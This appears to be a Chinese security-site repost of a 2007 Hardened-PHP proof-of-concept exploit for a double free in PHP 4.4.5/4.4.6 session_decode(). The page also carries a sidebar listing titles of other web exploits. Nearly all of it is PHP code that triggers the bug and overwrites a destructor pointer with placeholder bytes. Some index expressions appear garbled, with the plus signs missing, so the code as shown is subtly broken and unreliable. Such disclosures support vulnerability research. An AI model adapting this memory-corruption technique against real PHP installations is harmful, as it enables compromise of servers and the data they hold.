PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

所属分类：网络安全 / Exploit 阅读数： 151

收藏 0赞 0分享

<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP 4.4.5/4.4.6 session_decode() Double Free Vulnerability //
//////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE"); ini_set("session.serialize_handler", "php");
session_start(); $varname = str_repeat("D", 39);
$$varname = &$_SESSION; // Trigger the double free

session_decode($varname.'|i:0;');
$_________________x = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJ";
$_________________a = array("OneElement"); // Now x and a point to the same memory. Therefore x can be used to modify a // Overwrite pointer to the destructor
$_________________x[8*4 0] = chr(0x55);
$_________________x[8*4 1] = chr(0x66);
$_________________x[8*4 2] = chr(0x77);
$_________________x[8*4 3] = chr(0x88);

// Trigger the destruction
unset($_________________a);
?>

更多精彩内容其他人还在看

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

php Help Agent

Comdev Web Blogger

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

Galatolo Web Manager 1.3a

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

网络赚钱

站长故事